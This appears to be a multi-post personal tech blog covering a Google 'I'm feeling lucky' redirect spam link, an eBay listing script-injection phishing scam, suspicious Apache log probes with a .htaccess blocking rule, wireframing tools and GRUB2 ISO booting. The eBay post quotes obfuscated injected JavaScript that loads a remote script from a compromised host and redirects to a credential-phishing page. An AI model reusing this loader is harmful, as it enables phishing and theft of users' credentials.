I'm not feeling so lucky - The Google redirect issue

Following up from my the Amazon redirect scam, I thought that I would show a similar issue with another reputable site, this time Google.

I recently received a spam tweet from a hacked twitter account, the tweet contained a link to the following page:

https://www.google.com/webhp?client=opera&sourceid=opera#newwindow=1&q=About+us+php+-+Two+Brothers+Auto+Clinic+-+Full+Service+Auto&btnI=3564

This looks like a typical Google search for 'Two Brothers Auto Clinic,' however, if the unassuming user was to click on that link, they would be redirected to a spam site suggesting botox and weight loss treatments.

But how does this work I hear your cry...

Well, this is not a typical Google query because it contains 'btnI' which tells Google it's an 'I'm feeling lucky query'. Because of this, Google forwards the user to the first link in the search results, in this case the auto clinic site. Once the user lands in the attacked site, they are redirected to the spam site with this meta tag:

Somehow, by using a fragment instead of a traditional request parameter, this gets through Google's check on referrer (which checks that the user has come from the homepage).

This has happened before with other well-known and trusted sites, but it's a first from Google.

The Ebay Redirect Scam

I recently found out about yet another issue Ebay has had with security on there site. This time, the issue is script injection. I've attempted to briefly expose the technical innerworkings of this in this post. Here's an example:

When the use clicks on this page, a piece of remote javascript is loaded using this:
<br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><br /> <table align="center" style="border-spacing: 0px; width: 100%;"><tbody> <tr><td><br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><br /> <div id="ds_div"> <br /> <span class="Apple-tab-span" style="white-space: pre;"> </span><script type="text/javascript"><br>var az = "SC";var bz = "RI";var cz = "PT";var dz = "SR";var ez = "C=";var fz = "htt";var gz = "p://";<br>var fz0 = "agwgi.gr/wp-includes/js/tt/js5.js" ;<br>document.write ("<"+az+bz+cz+" type='text/javascript'"+dz+ez+fz+gz+fz0+">");<br>document.write("</"+az+bz+cz+">");<br></script><script src="http://*****.gr/wp-includes/js/tt/js5.js" type="text/javascript"></script></div> <br /> <span class="Apple-tab-span" style="white-space: pre;"> </span></td></tr> </tbody></table>
 Which, in turn loads this script from a Greek site:



<pre style="white-space: pre-wrap; word-wrap: break-word;"><b><code><code>function randomString(length, chars) { var result = ''; for (var i = length; i > 0; --i) result += chars[Math.round(Math.random() * (chars.length - 1))]; return result; } var a = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); var c = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); var e = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); var f = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); var d = randomString(3, '0123456789'); var b ="http://****.com.tr/wp-includes/js/thickbox/ac/beta.htm"; </code></code></b></pre> <b>
I don't know if any of the site owners are innocent, so I've commented them out just in case.

This JavaScript then sends a redirect to another page, which in turn redirects to a site asking for the users Ebay credentials (note the Norton verification seal in the bottom corner):

The login page is a PHP page and seems to change according to different ads placed on Ebay, but they're all focussed on phising Ebay credentials. 

To resolve this, Ebay should stop users submitting javascript in the description of listed products and, as this has actually been around for a while in the form of a flash app, flash should also be blocked.

Darlloz and other weird requests

Yesterday, I was looking at an arcticle detailing a new web app attack named 'Linux.Darlloz'. It exploits a vulnerability in PHP5. Fortunately, I dont use PHP, however I tailed my Apache logs and I found:

141.101.98.185 - - [05/Jan/2014:14:20:18 +0000] "GET /cgi-bin/php HTTP/1.1" 404 509 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

occuring every 10 minutes. This seems to be some sort of botnet with a faked user agent checking if I'm using PHP. After a few seconds, I received another request:

96.21.81.50 - - [05/Jan/2014:11:25:56 +0000] "\xf4n\x90\xe1\xb5r\xf8\xd0\x1d\x9d\xa7m\x1c\xb6Q\xef\xc4\xad\x97o\xaf\xb4*\x16E\xbd\x89sd\x9b\b\xdck\x0cU\xea$?!q\x84\x90t\xd0#K\xd6\xdb\x02Lv\xd9J\\S\xc4\xa9\x7f\xcaa\x04" 400 310 "-" "-"

I'm not really sure what this is, but I'm guessing its some sort of payload. My server didn't know how to handle it, so it sent an error.

The final request was:

183.60.48.25 - - [05/Jan/2014:09:29:01 +0000] "GET http://www.baidu.com/ HTTP/1.1" 200 1373 "-" "-"

This is apparently an Apache proxying request. I found that, after repeating the request in a Raw session, my server was responding. A lot of people have suggested that this is just an issue with DNS, however I remained suspicious and followed recomnedations to add a rewrite in .htaccess:

# Restrict HTTP methods

RewriteCond %{REQUEST_METHOD} !^(GET¦HEAD¦OPTIONS¦POST)$
RewriteRule .* - [F]
# Block proxy requests
RewriteCond %{THE_REQUEST} ^(GET¦HEAD¦POST)\ /?http:// [NC]
RewriteCond %{THE_REQUEST} !^(GET¦HEAD¦POST)\ /?http://(www\.)?yourdomain\.com/
RewriteCond %{THE_REQUEST} !^(GET¦HEAD¦POST)\ /?http://192\.168\.0\.37/
RewriteRule .* - [F]

I hope this helps any one who is as worried about rogue requests as I am!

Update

I've done a bit more research and apparently this attack is part of the Zmeu scanner. You can learn more here: http://ensourced.wordpress.com/2011/02/25/zmeu-attacks-some-basic-forensic/

Wireframing

As a guy who is incapable of producing decent designs and plans, I've looked around for the best Wireframing solutions. I've compiled the list below:

Wireframe.cc

Wireframe.cc is great to the extent that exporting is not allowed in the free version and there is branding scattered all over the site. The prices are reasonably low (around £10 a month for a single user), but the toolkit is impressive and it contains features such as version controlls to help organise your designs!

mockflow.com

Mockflow has the largest set of mock features for your site and themes to help you get started. However, disappointingly, you are restricted to one project only. The fully paid version costs alot (around £42 a month) however, if you are a freelance or professional developer, this might suite you. The collaboration features are also a step above the rest.

moqups.com

Moqups is a reasonably new contender, however the interface is easy to use and contains all the features that will help generate a reasonable wireframe. Moqups is also extreemly well priced (for 10 projects, its is around £5 or $9, there is a free version avaliable too).

gomockingbird.com

If you are looking to generate superior wireframes, then look no further. Mockingbird, from what I can see, is intended for use buy site developers and no by enthusiasts. It contains a suprising number of elements and supports excellent collaboration. There are many plans (all starting around $9), however the free version comes with one site and 10 pages, which is enough to get started with!

uxpin.com

UXPin from base up is built for multiple platforms. It is probably the most well known service and it has had a good reputation for a while now. There is no real free edition (only a 7-day free trial), however it costs ($14.99 per month). I have used this for certain projects before and I've not found any issues.

I've only managed to give a very basic insight into the tools avaliable (others include Balsamiq and Hotgloo), however if there are any that you think I should consider, please leave a comment below.

GRUB2 ISO Boot

A new feature in Grub 2 is the ability to boot raw ISO files. And, it is surprisingly simple.

Before continuing with this tutorial, please backup your files. I do not accept any liability for damage to systems.

1. Download an ISO image of your favorite distribution (I'm using Ubuntu 12.10, others may need different configuration). 64 bit requires a different configuration.
2. Move the ISO image to to the /boot section of your system. (This requires root privileges, so use: sudo mv).
3. Using root, edit /boot/grub/grub.cfg. Change the isofile variable and paste the following below the line: ### END /etc/grub.d/10_linux_proxy ###:
   

menuentry "Ubuntu ISO"{

        set isofile="/boot/ubuntu-12.10-desktop-i386.iso"

        loopback loop (hd1,5)$isofile

        linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=$isofile noprompt noeject

        initrd (loop)/casper/initrd.lz

}

 Thats it. Save, exit and reboot. Choose Ubuntu ISO in the grub menu. If you run into any problems, use a live CD to mount the grub partition and edit it by hand.